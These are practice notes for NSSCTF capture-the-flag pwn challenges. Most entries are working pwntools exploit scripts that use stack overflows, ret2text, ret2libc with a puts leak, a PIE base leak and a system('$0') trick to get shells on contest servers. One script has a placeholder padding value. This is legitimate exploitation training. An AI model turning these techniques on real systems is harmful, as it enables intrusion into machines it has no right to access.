NSSCTF pwn practice notes, page (1)
[SWPUCTF 2021 Freshman Contest]gift_pwn
from pwn import *
io = remote('node4.anna.nssctf.cn',28991)
padding = 16+8  # 16-byte buffer + 8-byte saved rbp
shell = 0x4005B6  # address of the backdoor function
payload = b'A'*padding+p64(shell)  # overwrite the saved return address with the backdoor
io.sendline(payload)
io.interactive()
[SWPUCTF 2021 Freshman Contest]whitegive_pwn
from pwn import *
from LibcSearcher import LibcSearcher  # not used below; the libc version was identified separately (see note)
context.log_level = 'debug'
io = remote('node4.anna.nssctf.cn',28982)
#io = gdb.debug('./附件')
elf = ELF('./附件')
padding = 16+8  # 16-byte buffer + 8-byte saved rbp
pop_rdi = 0x0000000000400763  # pop rdi ; ret
# Stage 1: leak the runtime address of puts by calling puts(puts@got), then return to main
payload = b'A'*padding + p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(elf.sym['main'])
io.sendline(payload)
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))  # 6 address bytes, zero-padded to 8
print(hex(puts_addr))
# Stage 2: derive the libc base from the leak and call system("/bin/sh")
base_offset = puts_addr - 0x06f6a0  # offset of puts in the matched libc
sys = 0x0453a0+base_offset          # offset of system in the matched libc
bin_sh = 0x18ce57+base_offset       # offset of the "/bin/sh" string in the matched libc
payload1 = b'A'*padding+p64(pop_rdi)+p64(bin_sh)+p64(sys)
io.sendline(payload1)
io.interactive()
The libc version has to be looked up separately.
[CISCN 2019 North China]PWN1
# Method 1: overwrite the local variable the program compares with the expected value
from pwn import *
context.log_level = 'debug'
io = remote('node4.anna.nssctf.cn',28020)
padding = 44
payload =b'A'*padding+p64(0x41348000)  # 0x41348000 is 11.28125 encoded as an IEEE-754 single
io.sendlineafter(b'number.',payload)
io.interactive()

# Method 2: overwrite the saved return address with the backdoor function
from pwn import *
context.log_level = 'debug'
io = remote('node4.anna.nssctf.cn',28020)
padding = 56
payload =b'A'*padding+p64(0x4006be)  # address of the backdoor function
io.sendlineafter(b'number.',payload)
io.interactive()
[NISACTF 2022]ReorPwn?
hs/nib/
[BJDCTF 2020]babystack2.0
from pwn import *
context.log_level = 'debug'
#io = process('./pwn')
#io = gdb.debug('./pwn')
io = remote('node4.anna.nssctf.cn',28485)
padding = 12+8+4  # actual distance to the saved return address, measured in the debugger
payload = b'A'*padding+p64(0x400726)  # address of the backdoor function
io.sendlineafter('name:\n',b'-1')  # length -1 passes the size check and lets the following read overflow
io.sendlineafter('name?\n',payload)
io.interactive()
# when running locally the stack needs to be aligned
The stack frame size IDA reports is wrong; work it out by debugging manually.
[HNCTF 2022 Week1]easync
nc
Connect with nc and look around; the flag format is nssctf{}.
[BJDCTF 2020]babystack
from pwn import *
context.log_level = 'debug'
#io = process('./ret2text')
#io = gdb.debug('./ret2text')
io = remote('node4.anna.nssctf.cn',28587)
padding = 12+8+4  # actual distance to the saved return address, measured in the debugger
payload = b'A'*padding+p64(0x4006e6)  # address of the backdoor function
io.sendlineafter('name:\n',b'100')  # a length larger than the buffer lets the following read overflow
io.sendlineafter('?\n',payload)
io.interactive()
# when running locally the stack needs to be aligned
The stack frame size IDA reports is wrong; work it out by debugging manually.
[SWPUCTF 2022 Freshman Contest]Does your nc work?
nc
Connect with nc and look around.
[NISACTF 2022]ezstack
from pwn import *
#io = process('./pwn')
io = remote('node5.anna.nssctf.cn',28318)
elf = ELF('./pwn')
padding = 72+4  # 72-byte buffer + 4-byte saved ebp (32-bit binary)
payload = b'A'*padding + p32(0x8048512)+p32(0x804A024)  # 32-bit: the argument follows on the stack
io.sendline(payload)
io.interactive()
Calling a function in a 32-bit program works differently from 64-bit: arguments are passed on the stack, not in registers.
[watevrCTF 2019]Voting Machine 1
from pwn import *
#io = process('./pwn')
io = remote('node5.anna.nssctf.cn',28007)
padding = 10  # PLACEHOLDER: the original note never defines padding; use the offset to the saved return address measured in gdb
payload = b'A'*padding + p64(0x400807)  # address of the backdoor function
io.sendline(payload)
print(io.recvall())  # read everything until the program closes the connection
io.interactive()
There is a backdoor function...
[NISACTF 2022]ezpie
from pwn import *
#io = process('./pwn')
io = remote('node5.anna.nssctf.cn',28323)
padding = 44
io.recvuntil(b'gift!\n')
main_addr = int(io.recvline().strip(), 16)  # the program prints the runtime address of main
base_offset = main_addr - 0x770  # 0x770 is main's offset inside the PIE binary
shell_addr = base_offset+0x80F   # 0x80F is the backdoor's offset inside the PIE binary
payload = b'A'*padding +p32(shell_addr)
io.sendline(payload)
io.interactive()
The main point is the PIE mechanism; the idea is much the same as leaking libc (leak one address, compute the base).
[HGAME 2023 week1]test_nc
cat flag
[GFCTF 2021]where_is_shell
from pwn import *
#io = process('./shell')
io = remote('node4.anna.nssctf.cn',28065)
elf = ELF('./shell')
pop_rdi = 0x00000000004005e3 #: pop rdi ; ret
sys_addr = 0x400557  # not used below; system is called through its PLT entry
ret_addr = 0x0000000000400416 #: ret
padding = 0x10+8  # 16-byte buffer + 8-byte saved rbp
# leading ret gadget keeps the stack 16-byte aligned before the call to system;
# 0x400541 points at the bytes "$0" (\x24\x30) inside the tips function, so this calls system("$0")
payload = b'A'*padding+p64(ret_addr)+p64(pop_rdi)+p64(0x400541)+p64(elf.plt['system'])+p64(ret_addr)
io.sendline(payload)
io.interactive()
You can get a shell with system($0): "$0" is \x24\x30 in machine code, and the tips function happens to contain exactly those bytes. Another small trick worth knowing.
[HNCTF 2022 Week1]easyoverflow
1111111111111111111111111111111111111111111111111111
Argument overwrite: overflowing v4 overwrites v5.